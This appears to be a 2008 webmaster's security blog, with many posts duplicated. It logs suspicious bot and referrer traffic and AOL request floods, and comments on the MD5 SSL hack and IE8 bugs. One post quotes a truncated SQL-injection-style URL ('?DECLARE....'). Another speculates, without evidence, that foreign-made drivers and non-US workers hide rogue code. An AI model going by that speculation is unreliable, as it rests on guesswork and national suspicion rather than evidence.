"It’s imperative that browsers and CAs stop using MD5, and migrate to more robust alternatives such as SHA-2 and the upcoming SHA-3 standard."
I did some reasearch to find out which CAs are using MD5 encryption instead of SHA and found that this particular hack was targeted at VeriSign's RapidSSL.com:
MD5 SSL hack analysis
I was able to confirm that Network Solutions does not use MD5 encryption.
Microsoft claims this hack poses no major threat to users
Microsoft says SSL MD5 hack poses no real threat
Hackers Break SSL
Additionally the article points out that the hack is in SSL certificates using MD5. As the end of the article states:
"It’s imperative that browsers and CAs stop using MD5, and migrate to more robust alternatives such as SHA-2 and the upcoming SHA-3 standard."
I did some reasearch to find out which CAs are using MD5 encryption instead of SHA and found that this particular hack was targeted at VeriSign's RapidSSL.com:
MD5 SSL hack analysis
I was able to confirm that Network Solutions does not use MD5 encryption.
Microsoft claims this hack poses no major threat to users
Microsoft says SSL MD5 hack poses no real threat
Sunday, December 28, 2008
Microsoft IE8 beta 2 bug report
I don't understand why Microsoft makes it so difficult to submit a bug to them. It would be so nice if qualified users who are programmers and such or "expert" users could easily submit a bug report. Other companies do this and I imagine it helps them find key issues and solve problems more quickly. Since I don't see an easy way to do this with IE beta 8 I'll list some bugs I found here:
When I visited one web site with flash I could not scroll down to content at the bottom of the page.
When I copy and paste certain URLs from Firefox to IE (because, for instance the home page of a site with flash doesn't scroll correctly so I go to Firefox to get to the URL I want) and then I try to copy and past the URL back into IE - CRASH. Big time. Everything hangs. I haven't figure out if it is every URL or just that one.
The blogger home page doesn't display correctly, nor does https://update.microsoft.com.
I think I listed the problems with my webmail site earlier - messages disappearing and strange duplicate images appearing on the screen.
When I visited one web site with flash I could not scroll down to content at the bottom of the page.
When I copy and paste certain URLs from Firefox to IE (because, for instance the home page of a site with flash doesn't scroll correctly so I go to Firefox to get to the URL I want) and then I try to copy and past the URL back into IE - CRASH. Big time. Everything hangs. I haven't figure out if it is every URL or just that one.
The blogger home page doesn't display correctly, nor does https://update.microsoft.com.
I think I listed the problems with my webmail site earlier - messages disappearing and strange duplicate images appearing on the screen.
CitySearch traffic - suspicious jump
There's been a significant jump in traffic from citysearch.com and some of it does not look legitimate. For instance we'll see a group of hits in a row from the same IP address or a block of hits from different IP addresses within seconds of each other. The amount of traffic in December has almost doubled - in a month where typically traffic falls. The increase in traffic is not leading to additional sales or leads so I doubt it is actual web surfing people looking for the products and services on the web site to which they were referred by citysearch.com.
This jump in traffic comes shortly after blocking out other countries where we do not do business (RIPE, APNIC, AFRINIC). Multiple IPs hitting the site in succession seconds appart matches the M.O. of these particular hackers. Additionally we have been reporting on traffic from seemingly odd and bogus URLs and the traffic seems to have jumped. Not sure how related all this is.
Are hackers using the citysearch site and hacked computers to gain access to our sites, or is the citysearch traffic rigged somehow? Not sure but somethings smells hacky.
This jump in traffic comes shortly after blocking out other countries where we do not do business (RIPE, APNIC, AFRINIC). Multiple IPs hitting the site in succession seconds appart matches the M.O. of these particular hackers. Additionally we have been reporting on traffic from seemingly odd and bogus URLs and the traffic seems to have jumped. Not sure how related all this is.
Are hackers using the citysearch site and hacked computers to gain access to our sites, or is the citysearch traffic rigged somehow? Not sure but somethings smells hacky.
Friday, December 26, 2008
IE 6 traffic - 91% referrals
A quick analysis of traffic this month shows that 91% of traffic from IE6 browsers is via a referral link.
This may or may not be legitimate but seems a bit odd.
This may or may not be legitimate but seems a bit odd.
Garbage Sites and Traffic Logs
I find it interesting when I review my logs and see hits from totally random URLs with complete garbage content like this one: www . esitesbuilder . com/pid/1/index.html
There are a bunch of related sites that look like garbage and links designed to get sites better rankings - but waste everyone's time in the process. If the sites would instead post quality information and do legitimate business they would get rankings.
I also find the referrals from these garbage sites to be questionable. Anyone who goes to these sites and does not immediately click off the page I'm guessing is some kind of bot. This is further reinforced by the bad traffic we get from the networks that click on these links.
This IP, for instance, came from a complete garbage referral site and clicked onto a site on our server that has nothing to do with the content on the page from which the click was referred. I highly doubt this is a valid web surfer who wants to buy products on the site clicked on, not to mention the web request was invalid:
HOP ONE: 209.160.65.50
This is just pointing out that not all traffic is good traffic and not all links are worthwhile. I wish Google would just eliminate these garbage sites for their listings. They seem like they are pretty easy to spot. They all are structured the same way.
There are a bunch of related sites that look like garbage and links designed to get sites better rankings - but waste everyone's time in the process. If the sites would instead post quality information and do legitimate business they would get rankings.
I also find the referrals from these garbage sites to be questionable. Anyone who goes to these sites and does not immediately click off the page I'm guessing is some kind of bot. This is further reinforced by the bad traffic we get from the networks that click on these links.
This IP, for instance, came from a complete garbage referral site and clicked onto a site on our server that has nothing to do with the content on the page from which the click was referred. I highly doubt this is a valid web surfer who wants to buy products on the site clicked on, not to mention the web request was invalid:
HOP ONE: 209.160.65.50
This is just pointing out that not all traffic is good traffic and not all links are worthwhile. I wish Google would just eliminate these garbage sites for their listings. They seem like they are pretty easy to spot. They all are structured the same way.
Sunday, December 21, 2008
Wildblue.net - Denial of Service Attack?
Today we were hit by four different IP addresses and multiple user agents from the Wildblue.net network in an apparent DOS attack. It ended up causing some problems on our web site. There were about 80 hits in less than one minute.
We have reported the incident to abuse@wildblue.net so hopefully it will not happen again.
We have reported the incident to abuse@wildblue.net so hopefully it will not happen again.
Failed Logins - Excellent addition to any web site
Having a display of any recent failed logins, time, date and computer address is a GREAT addition to any web site. The benefit of this is that a given user will know if they did not attempt a login at that date/time. Technical users can help non-technical users determine if the IP logged in from does not belong to the owner of the account. I wish every web application in the world had this function. I am adding it to all of mine. Of course this function needs to be secure ...so it cannot be accessed or modified by hackers through some sort of injection as well.
Thursday, December 18, 2008
Strange Traffic = IE5 + Opera?
Got a whole bunch of requests on a site tonight from this user agent:
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
This looks a little odd and the traffic was hitting the same site alternatively on www. and without the www. - basically hitting all the pages in the site.
The IP address: 67.43.136.74
Time: 12/17/2008 7:40:44 PM
Mozilla/4.0 (compatible; MSIE 5.0; Windows XP) Opera 6.05 [en]
This looks a little odd and the traffic was hitting the same site alternatively on www. and without the www. - basically hitting all the pages in the site.
The IP address: 67.43.136.74
Time: 12/17/2008 7:40:44 PM
Strange Referrers
We're getting traffic directed from strange referring sites. I have noticed this in the past and not sure why it happens, but I am guessing it's related to some sort of hack or attack on our sites and possibly from hacked servers.
Here are some examples with the IP that made the request and the referrer - these three requests came one after another so would kind of assume they are related in some way:
24.17.158.209
http://salondirectory.com/results-sp.php?search=landscape%2Blighting&location=ferndale%2C+wa
24.17.158.209
http://www.entertainmentdirectory.com/results-sp.php?bcat=landscape+lighting&place=Ferndale%2C+Wa
67.183.111.250
http://click.zipcodez.com/zip2.php?keyword=organic+gardening&aff=4345&urlparm=ppc&blob=de60dc8b237b1761616efb5f44307d8c-MTIyOTU3NDEzMAk2Ny4xODMuMTExLjI1MAkJcF9yczAxCTQzNDUJb3JnYW5pYytnYXJkZW5pbmcJc3VwZXJwYWdlcwlodHRwOi8vY2xpY2tzLnN1cGVycGFnZXMuY29tL2
Here are some examples with the IP that made the request and the referrer - these three requests came one after another so would kind of assume they are related in some way:
24.17.158.209
http://salondirectory.com/results-sp.php?search=landscape%2Blighting&location=ferndale%2C+wa
24.17.158.209
http://www.entertainmentdirectory.com/results-sp.php?bcat=landscape+lighting&place=Ferndale%2C+Wa
67.183.111.250
http://click.zipcodez.com/zip2.php?keyword=organic+gardening&aff=4345&urlparm=ppc&blob=de60dc8b237b1761616efb5f44307d8c-MTIyOTU3NDEzMAk2Ny4xODMuMTExLjI1MAkJcF9yczAxCTQzNDUJb3JnYW5pYytnYXJkZW5pbmcJc3VwZXJwYWdlcwlodHRwOi8vY2xpY2tzLnN1cGVycGFnZXMuY29tL2
Friday, December 05, 2008
Monday, December 01, 2008
AOL Traffic Spam - MOOZILLA
We have a site that literally just got bombed by traffic from AOL with user agent MOOZILLA. The interesting thing is that the IP addresses in each request are not the same. Is someone initiating a bunch of different sessions to try to kill the server? What is this? We've notified AOL...we'll see if that does any good.
Sample traffic:
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.69
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.136
12/1/2008 10:32:03 PM 207.200.116.69
12/1/2008 10:32:02 PM 207.200.116.136
Sample traffic:
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.69
12/1/2008 10:32:03 PM 207.200.116.138
12/1/2008 10:32:03 PM 207.200.116.136
12/1/2008 10:32:03 PM 207.200.116.69
12/1/2008 10:32:02 PM 207.200.116.136
Tuesday, November 25, 2008
Google Apps - Unidentified Bot
Google, when validating domains for any of it's services, should send an appropriate user agent, not Jakarta Commons-HttpClient/3.0.1 as it does for Google Apps. Something with "Google" in the name would be lovely.
Sunday, November 09, 2008
Ajax webmail systems and bad performance
All these AJAX mail systems work fine for a while, then they start slowing down. Is it the amount of mail in the mailbox? The number of folders? Or is there a security flaw in AJAX related to mail systems?
Every time I use an AJAX mail system - even this latest one where I imported all my old mail - the system goes quickly for a while at first and then after a while suddenly the performance becomes a dog. Maybe it is the amount of mail in my mailbox of something but it seems to be something more than that.
I have nailed down in the case of my current webmail system that it is probably not the network - unless someone is hacking all four different networks I use at different times.
Every time I use an AJAX mail system - even this latest one where I imported all my old mail - the system goes quickly for a while at first and then after a while suddenly the performance becomes a dog. Maybe it is the amount of mail in my mailbox of something but it seems to be something more than that.
I have nailed down in the case of my current webmail system that it is probably not the network - unless someone is hacking all four different networks I use at different times.
Saturday, November 08, 2008
CNN Reports Chinese Hackers Cracked Pentagon
CNN just had a big report about how Chinese hackers cracked the Pentagon network but not the "top secret" network. However there was some questioning about why President Bush was not responding. There is also question as to whether these Chinese hackers are acting on behalf of themselves, the Chinese government, or someone else. It is probably not good to make assumptions until the facts are known.
The point is - our networks and computer infrastructure is not secure. One of the reasons it is not secure is because we are using computer components with software drivers made in foreign countries. The software drivers are a good place to hide rogue code because it is very low level and would be difficult to track down and verify security problems with this code.
For example, I'm not exactly sure how the software for a network card works, but network information from the remote location probably passes through the network card drivers on the PC before getting into the operating system. What are the chances that network card software is altering the IP addresses that are being displayed as the remote computer from which the traffic is coming.
I have no idea if that is the case but I would think it is possible. I would also think that if a computer could be compromised one of the many people Microsoft employs that potentially worked on network related software could figure out how to swap out key code on a machine and/or cause an alternate class to be called to handle network traffic differently than Microsoft has intended.
How many people really understand the network software to this low level? Probably most of the people who understand it best are the non-US citizens employed by all of the top corporations in the US when they ship in people from Infosys while laying off US citizens who have years of experience and have completed successful projects for them that save them a lot of money (not that I have any personal experience with this or anything.....)
However it is sad but we must also consider the possibility that US Citizens (in a very tough economy created by all this job outsourcing) have compromised systems for external third parties. So it is not just safe to trust US Citizens either.
The issue here is: Audit Everything.
The point is - our networks and computer infrastructure is not secure. One of the reasons it is not secure is because we are using computer components with software drivers made in foreign countries. The software drivers are a good place to hide rogue code because it is very low level and would be difficult to track down and verify security problems with this code.
For example, I'm not exactly sure how the software for a network card works, but network information from the remote location probably passes through the network card drivers on the PC before getting into the operating system. What are the chances that network card software is altering the IP addresses that are being displayed as the remote computer from which the traffic is coming.
I have no idea if that is the case but I would think it is possible. I would also think that if a computer could be compromised one of the many people Microsoft employs that potentially worked on network related software could figure out how to swap out key code on a machine and/or cause an alternate class to be called to handle network traffic differently than Microsoft has intended.
How many people really understand the network software to this low level? Probably most of the people who understand it best are the non-US citizens employed by all of the top corporations in the US when they ship in people from Infosys while laying off US citizens who have years of experience and have completed successful projects for them that save them a lot of money (not that I have any personal experience with this or anything.....)
However it is sad but we must also consider the possibility that US Citizens (in a very tough economy created by all this job outsourcing) have compromised systems for external third parties. So it is not just safe to trust US Citizens either.
The issue here is: Audit Everything.
Wednesday, November 05, 2008
AT&T Wireless Card Doesn't work in Wisconsin
I was in the heart of America - center of Wisconsin - in some small towns and the AT&T wireless card advertised on TV to find the Internet - anywhere - didn't work. Try around Mauston, Tomah, etc.
Strange Characters on Web Pages using AT&T
Strange characters at the top of pages using AT&T Internet card.
I keep getting these characters at the top of web pages when using AT&T wireless card on the bus on the way to work:
rs6B5
I keep getting these characters at the top of web pages when using AT&T wireless card on the bus on the way to work:
rs6B5
Thursday, September 18, 2008
Russion Job Seeker Hackers
Another attack from Russia (or at least a computer in Russia) on job seekers - in a section of business week targeting job related section of the site.
I would put the article link here but when I go to the page Norton says it's blocking a virus, so will refrain.
I would put the article link here but when I go to the page Norton says it's blocking a virus, so will refrain.
HTTP Adobe SWF Remote Code Execution
Apparently an attack was blocked on my computer:
Http Adobe SWF Remote Code Execution
Risk: High
remote machine: ad101com-images.adbeareau.net (96.17.108.107)
Site I was visiting: http://adtmag.com/article.aspx?id=23284
(the ads may rotate)
Network:
OrgName: Akamai Technologies
OrgID: AKAMAI
Address: 8 Cambridge Center
City: Cambridge
StateProv: MA
PostalCode: 02142
Country: US
NetRange: 96.16.0.0 - 96.17.255.255
I just realized that the email came from: AppTrendsNL@1105service.com
http://whois.domaintools.com/1105service.com
Coincidentally, I was just reading about a click attack that Adobe was asking some hackers not to report.
Http Adobe SWF Remote Code Execution
Risk: High
remote machine: ad101com-images.adbeareau.net (96.17.108.107)
Site I was visiting: http://adtmag.com/article.aspx?id=23284
(the ads may rotate)
Network:
OrgName: Akamai Technologies
OrgID: AKAMAI
Address: 8 Cambridge Center
City: Cambridge
StateProv: MA
PostalCode: 02142
Country: US
NetRange: 96.16.0.0 - 96.17.255.255
I just realized that the email came from: AppTrendsNL@1105service.com
http://whois.domaintools.com/1105service.com
Coincidentally, I was just reading about a click attack that Adobe was asking some hackers not to report.
Wednesday, September 10, 2008
Latest hack - Code tacked onto URL
There seems to be a new hack on the loose. Well it's not that new because I noticed before but didn't have time to blog it. Seems that someone is attempting to include some code at the end of a URL as shown in this image (click on the image to see a larger size image showing the code that is tacked onto the end of a url like:
http://www.somesite.com/?DECLARE....

This particular traffic comes from:
142.167.53.105 9/10/2008
OrgName: Stentor National Integrated Communications Network
OrgID: SNI1
Address: One Brunswick Square
City: Saint John
StateProv: NB
PostalCode: E2L-4K2
Country: CA
NetRange: 142.167.0.0 - 142.167.255.255
http://www.somesite.com/?DECLARE....

This particular traffic comes from:
142.167.53.105 9/10/2008
OrgName: Stentor National Integrated Communications Network
OrgID: SNI1
Address: One Brunswick Square
City: Saint John
StateProv: NB
PostalCode: E2L-4K2
Country: CA
NetRange: 142.167.0.0 - 142.167.255.255
Monday, September 08, 2008
Encrypted Email
I understand that you can encrypt email and someone cannot read the contents (assuming they cannot hack your encryption technology) but what I want to know is this - you have to include in your email the destination and is the email address itself readable? In that case what prevents the hackers from replacing encrypted email contents with a spam message and changing the from email address? Just wondering.
Monday, July 28, 2008
DNS Spoof - Hack
DNS Hack
To all these Network admins that claim their DNS cannot possibly be hacked - I hate to say it but ...told you so.
To all these Network admins that claim their DNS cannot possibly be hacked - I hate to say it but ...told you so.
Thursday, July 10, 2008
oozbot. bad.
7/8/2008 12:25 67.215.230.11 OOZBOT/0.17 (--; http://www.setooz.com/oozbot.html; pvvpr at iiit dot ac dot in)
OOZBOT is not a good bot to have hanging around. First of all it is not obeying robots.txt.
Second of all it's scanning e-commerce related sites.
I cannot imagine this bot is up to anything worthwhile.
OOZBOT is not a good bot to have hanging around. First of all it is not obeying robots.txt.
Second of all it's scanning e-commerce related sites.
I cannot imagine this bot is up to anything worthwhile.
PHP Version Tracker
Here's a bot you'll most likely want to block:
7/8/2008 12:45 70.82.51.98 PHP version tracker (http://www.nexen.net/phpversion/bot.php)
It scans servers it has no business scanning for software they are not running. It doesn't obey robots.txt and I've had a lot of other traffic from this network that was highly questionable.
Le Groupe Videotron Ltee VL-17BL (NET-70-80-0-0-1)
70.80.0.0 - 70.83.255.255
Videotron Ltee VL-D-MO-46523300 (NET-70-82-51-0-1)
70.82.51.0 - 70.82.51.255
7/8/2008 12:45 70.82.51.98 PHP version tracker (http://www.nexen.net/phpversion/bot.php)
It scans servers it has no business scanning for software they are not running. It doesn't obey robots.txt and I've had a lot of other traffic from this network that was highly questionable.
Le Groupe Videotron Ltee VL-17BL (NET-70-80-0-0-1)
70.80.0.0 - 70.83.255.255
Videotron Ltee VL-D-MO-46523300 (NET-70-82-51-0-1)
70.82.51.0 - 70.82.51.255
Tuesday, July 08, 2008
Moozilla
What's up with all the Moozilla user agents coming from Netscape?
7/3/2008 11:02:49 AM 207.200.116.202 Moozilla
7/3/2008 11:02:49 AM 207.200.116.138 Moozilla
7/3/2008 11:02:49 AM 207.200.116.202 Moozilla
7/3/2008 11:02:49 AM 207.200.116.138 Moozilla
7/3/2008 11:02:48 AM 207.200.116.197 Moozilla
7/3/2008 11:02:48 AM 207.200.116.66 Moozilla
7/3/2008 11:02:48 AM 207.200.116.65 Moozilla
7/3/2008 11:02:48 AM 207.200.116.131 Moozilla
7/3/2008 11:02:48 AM 207.200.116.197 Moozilla
7/3/2008 11:02:48 AM 207.200.116.66 Moozilla
7/3/2008 11:02:47 AM 207.200.116.131 Moozilla
7/3/2008 11:02:47 AM 207.200.116.65 Moozilla
7/3/2008 11:02:47 AM 207.200.116.132 Moozilla
7/3/2008 11:02:47 AM 207.200.116.138 Moozilla
7/3/2008 11:02:47 AM 207.200.116.12 Moozilla
7/3/2008 11:02:47 AM 207.200.116.137 Moozilla
7/3/2008 11:02:47 AM 207.200.116.132 Moozilla
7/3/2008 11:02:47 AM 207.200.116.138 Moozilla
7/3/2008 11:02:47 AM 207.200.116.12 Moozilla
7/3/2008 11:02:47 AM 207.200.116.137 Moozilla
7/3/2008 11:02:46 AM 207.200.116.74 Moozilla
7/3/2008 11:02:46 AM 207.200.116.6 Moozilla
7/3/2008 11:02:46 AM 207.200.116.65 Moozilla
7/3/2008 11:02:46 AM 207.200.116.74 Moozilla
7/3/2008 11:02:46 AM 207.200.116.11 Moozilla
7/3/2008 11:02:46 AM 207.200.116.6 Moozilla
7/3/2008 11:02:46 AM 207.200.116.11 Moozilla
7/3/2008 11:02:46 AM 207.200.116.65 Moozilla
7/3/2008 11:02:45 AM 207.200.116.7 Moozilla
7/3/2008 11:02:45 AM 207.200.116.202 Moozilla
7/3/2008 11:02:45 AM 207.200.116.195 Moozilla
7/3/2008 11:02:45 AM 207.200.116.7 Moozilla
7/3/2008 11:02:45 AM 207.200.116.69 Moozilla
7/3/2008 11:02:45 AM 207.200.116.202 Moozilla
7/3/2008 11:02:45 AM 207.200.116.195 Moozilla
7/3/2008 11:02:45 AM 207.200.116.69 Moozilla
7/3/2008 11:02:43 AM 207.200.116.204 Moozilla
7/3/2008 11:02:43 AM 207.200.116.13 Moozilla
7/3/2008 11:02:42 AM 207.200.116.69 Moozilla
7/3/2008 11:02:41 AM 207.200.116.199 Moozilla
7/3/2008 11:02:41 AM 207.200.116.136 Moozilla
7/3/2008 7:44:34 AM 207.200.116.202 Moozilla
7/3/2008 7:44:34 AM 207.200.116.138 Moozilla
7/3/2008 7:44:34 AM 207.200.116.202 Moozilla
7/3/2008 7:44:34 AM 207.200.116.197 Moozilla
7/3/2008 7:44:34 AM 207.200.116.138 Moozilla
7/3/2008 7:44:34 AM 207.200.116.197 Moozilla
7/3/2008 7:44:34 AM 207.200.116.65 Moozilla
7/3/2008 7:44:34 AM 207.200.116.131 Moozilla
7/3/2008 7:44:34 AM 207.200.116.66 Moozilla
7/3/2008 7:44:34 AM 207.200.116.131 Moozilla
7/3/2008 7:44:34 AM 207.200.116.12 Moozilla
7/3/2008 7:44:34 AM 207.200.116.65 Moozilla
7/3/2008 7:44:33 AM 207.200.116.66 Moozilla
7/3/2008 7:44:33 AM 207.200.116.12 Moozilla
7/3/2008 7:44:33 AM 207.200.116.138 Moozilla
7/3/2008 7:44:33 AM 207.200.116.132 Moozilla
7/3/2008 7:44:33 AM 207.200.116.137 Moozilla
7/3/2008 7:44:33 AM 207.200.116.138 Moozilla
7/3/2008 7:44:33 AM 207.200.116.132 Moozilla
7/3/2008 7:44:33 AM 207.200.116.137 Moozilla
7/3/2008 7:44:32 AM 207.200.116.6 Moozilla
7/3/2008 7:44:32 AM 207.200.116.74 Moozilla
7/3/2008 7:44:32 AM 207.200.116.11 Moozilla
7/3/2008 7:44:32 AM 207.200.116.65 Moozilla
7/3/2008 7:44:32 AM 207.200.116.74 Moozilla
7/3/2008 7:44:32 AM 207.200.116.202 Moozilla
7/3/2008 7:44:32 AM 207.200.116.11 Moozilla
7/3/2008 7:44:32 AM 207.200.116.65 Moozilla
7/3/2008 7:44:32 AM 207.200.116.202 Moozilla
7/3/2008 7:44:32 AM 207.200.116.7 Moozilla
7/3/2008 7:44:32 AM 207.200.116.195 Moozilla
7/3/2008 7:44:32 AM 207.200.116.69 Moozilla
7/3/2008 7:44:32 AM 207.200.116.204 Moozilla
7/3/2008 7:44:32 AM 207.200.116.7 Moozilla
7/3/2008 7:44:32 AM 207.200.116.195 Moozilla
7/3/2008 7:44:32 AM 207.200.116.69 Moozilla
7/3/2008 7:44:31 AM 207.200.116.204 Moozilla
7/3/2008 7:44:31 AM 207.200.116.13 Moozilla
7/3/2008 7:44:31 AM 207.200.116.136 Moozilla
7/3/2008 7:44:31 AM 207.200.116.199 Moozilla
7/3/2008 7:44:31 AM 207.200.116.69 Moozilla
7/3/2008 7:44:31 AM 207.200.116.13 Moozilla
7/3/2008 7:44:31 AM 207.200.116.136 Moozilla
7/3/2008 7:44:31 AM 207.200.116.199 Moozilla
7/3/2008 7:44:31 AM 207.200.116.69 Moozilla
7/2/2008 11:53:13 PM 66.114.145.245 Moozilla
7/2/2008 11:53:13 PM 66.114.145.245 Moozilla
7/2/2008 7:46:34 PM 207.200.116.202 Moozilla
7/2/2008 7:46:34 PM 207.200.116.138 Moozilla
7/2/2008 7:46:34 PM 207.200.116.202 Moozilla
7/2/2008 7:46:34 PM 207.200.116.138 Moozilla
7/2/2008 7:46:33 PM 207.200.116.197 Moozilla
7/2/2008 7:46:33 PM 207.200.116.65 Moozilla
7/2/2008 7:46:33 PM 207.200.116.138 Moozilla
7/2/2008 7:46:33 PM 207.200.116.197 Moozilla
7/2/2008 7:46:33 PM 207.200.116.65 Moozilla
7/2/2008 7:46:33 PM 207.200.116.66 Moozilla
7/2/2008 7:46:33 PM 207.200.116.131 Moozilla
7/2/2008 7:46:33 PM 207.200.116.66 Moozilla
7/2/2008 7:46:33 PM 207.200.116.12 Moozilla
7/2/2008 7:46:33 PM 207.200.116.131 Moozilla
7/2/2008 7:46:33 PM 207.200.116.12 Moozilla
7/2/2008 7:46:32 PM 207.200.116.138 Moozilla
7/2/2008 7:46:32 PM 207.200.116.132 Moozilla
7/2/2008 7:46:32 PM 207.200.116.137 Moozilla
7/2/2008 7:46:32 PM 207.200.116.138 Moozilla
7/2/2008 7:46:32 PM 207.200.116.132 Moozilla
7/2/2008 7:46:32 PM 207.200.116.137 Moozilla
7/2/2008 7:46:32 PM 207.200.116.6 Moozilla
7/2/2008 7:46:32 PM 207.200.116.74 Moozilla
7/2/2008 7:46:32 PM 207.200.116.6 Moozilla
7/2/2008 7:46:32 PM 207.200.116.74 Moozilla
7/2/2008 7:46:31 PM 207.200.116.11 Moozilla
7/2/2008 7:46:31 PM 207.200.116.65 Moozilla
7/2/2008 7:46:31 PM 207.200.116.195 Moozilla
7/2/2008 7:46:31 PM 207.200.116.65 Moozilla
7/2/2008 7:46:31 PM 207.200.116.202 Moozilla
7/2/2008 7:46:31 PM 207.200.116.195 Moozilla
7/2/2008 7:46:31 PM 207.200.116.7 Moozilla
7/2/2008 7:46:31 PM 24.18.131.178 Moozilla
7/2/2008 7:46:31 PM 207.200.116.7 Moozilla
7/2/2008 7:46:31 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.204 Moozilla
7/2/2008 7:46:30 PM 207.200.116.13 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.204 Moozilla
7/2/2008 7:46:30 PM 207.200.116.13 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.136 Moozilla
7/2/2008 7:46:30 PM 207.200.116.199 Moozilla
7/2/2008 7:46:30 PM 207.200.116.69 Moozilla
7/2/2008 7:46:30 PM 207.200.116.136 Moozilla
7/2/2008 7:46:30 PM 207.200.116.199 Moozilla
7/2/2008 7:09:08 PM 71.35.127.98 Moozilla
7/2/2008 7:09:08 PM 71.35.127.98 Moozilla
7/2/2008 5:57:43 PM 207.200.116.195 Moozilla
7/2/2008 5:57:43 PM 207.200.116.202 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.195 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.197 Moozilla
7/2/2008 5:57:42 PM 207.200.116.138 Moozilla
7/2/2008 5:57:42 PM 207.200.116.197 Moozilla
7/2/2008 5:57:42 PM 207.200.116.65 Moozilla
7/2/2008 5:57:42 PM 207.200.116.66 Moozilla
7/2/2008 5:57:42 PM 207.200.116.65 Moozilla
7/2/2008 5:57:42 PM 207.200.116.131 Moozilla
7/2/2008 5:57:42 PM 207.200.116.66 Moozilla
7/2/2008 5:57:41 PM 207.200.116.131 Moozilla
7/2/2008 5:57:41 PM 207.200.116.12 Moozilla
7/2/2008 5:57:41 PM 207.200.116.132 Moozilla
7/2/2008 5:57:41 PM 207.200.116.12 Moozilla
7/2/2008 5:57:41 PM 207.200.116.138 Moozilla
7/2/2008 5:57:41 PM 207.200.116.6 Moozilla
7/2/2008 5:57:41 PM 207.200.116.137 Moozilla
7/2/2008 5:57:41 PM 207.200.116.74 Moozilla
7/2/2008 5:57:41 PM 207.200.116.6 Moozilla
7/2/2008 5:57:41 PM 207.200.116.137 Moozilla
7/2/2008 5:57:40 PM 207.200.116.74 Moozilla
7/2/2008 5:57:40 PM 207.200.116.65 Moozilla
7/2/2008 5:57:40 PM 207.200.116.11 Moozilla
7/2/2008 5:57:40 PM 207.200.116.202 Moozilla
7/2/2008 5:57:40 PM 207.200.116.11 Moozilla
7/2/2008 5:57:40 PM 207.200.116.65 Moozilla
7/2/2008 5:57:40 PM 207.200.116.202 Moozilla
7/2/2008 5:57:40 PM 207.200.116.204 Moozilla
7/2/2008 5:57:40 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.7 Moozilla
7/2/2008 5:57:39 PM 207.200.116.204 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.7 Moozilla
7/2/2008 5:57:39 PM 207.200.116.13 Moozilla
7/2/2008 5:57:39 PM 207.200.116.199 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.136 Moozilla
7/2/2008 5:57:39 PM 207.200.116.13 Moozilla
7/2/2008 5:57:39 PM 207.200.116.69 Moozilla
7/2/2008 5:57:39 PM 207.200.116.136 Moozilla
7/2/2008 5:57:39 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.69 Moozilla
7/2/2008 5:14:49 PM 207.200.116.138 Moozilla
7/2/2008 5:14:49 PM 207.200.116.69 Moozilla
7/2/2008 5:14:49 PM 207.200.116.199 Moozilla
7/2/2008 5:14:49 PM 207.200.116.138 Moozilla
7/2/2008 5:14:48 PM 207.200.116.138 Moozilla
7/2/2008 5:14:48 PM 207.200.116.69 Moozilla
7/2/2008 5:14:48 PM 207.200.116.199 Moozilla
7/2/2008 5:14:48 PM 207.200.116.69 Moozilla
7/2/2008 5:14:48 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.202 Moozilla
7/2/2008 5:14:47 PM 207.200.116.197 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.138 Moozilla
7/2/2008 5:14:47 PM 207.200.116.197 Moozilla
7/2/2008 5:14:46 PM 207.200.116.65 Moozilla
7/2/2008 5:14:46 PM 207.200.116.66 Moozilla
7/2/2008 5:14:46 PM 207.200.116.131 Moozilla
7/2/2008 5:14:46 PM 207.200.116.65 Moozilla
7/2/2008 5:14:46 PM 207.200.116.66 Moozilla
7/2/2008 5:14:46 PM 207.200.116.131 Moozilla
7/2/2008 5:14:46 PM 207.200.116.12 Moozilla
7/2/2008 5:14:46 PM 207.200.116.132 Moozilla
7/2/2008 5:14:46 PM 207.200.116.138 Moozilla
7/2/2008 5:14:46 PM 207.200.116.132 Moozilla
7/2/2008 5:14:46 PM 207.200.116.138 Moozilla
7/2/2008 5:14:46 PM 207.200.116.6 Moozilla
7/2/2008 5:14:45 PM 207.200.116.137 Moozilla
7/2/2008 5:14:45 PM 207.200.116.6 Moozilla
7/2/2008 5:14:45 PM 207.200.116.11 Moozilla
7/2/2008 5:14:45 PM 207.200.116.74 Moozilla
7/2/2008 5:14:45 PM 207.200.116.65 Moozilla
7/2/2008 5:14:45 PM 207.200.116.74 Moozilla
7/2/2008 5:14:45 PM 207.200.116.11 Moozilla
7/2/2008 5:14:45 PM 207.200.116.202 Moozilla
7/2/2008 5:14:45 PM 207.200.116.65 Moozilla
7/2/2008 5:14:45 PM 207.200.116.202 Moozilla
7/2/2008 5:14:45 PM 207.200.116.195 Moozilla
7/2/2008 5:14:44 PM 207.200.116.7 Moozilla
7/2/2008 5:14:44 PM 207.200.116.204 Moozilla
7/2/2008 5:14:44 PM 207.200.116.69 Moozilla
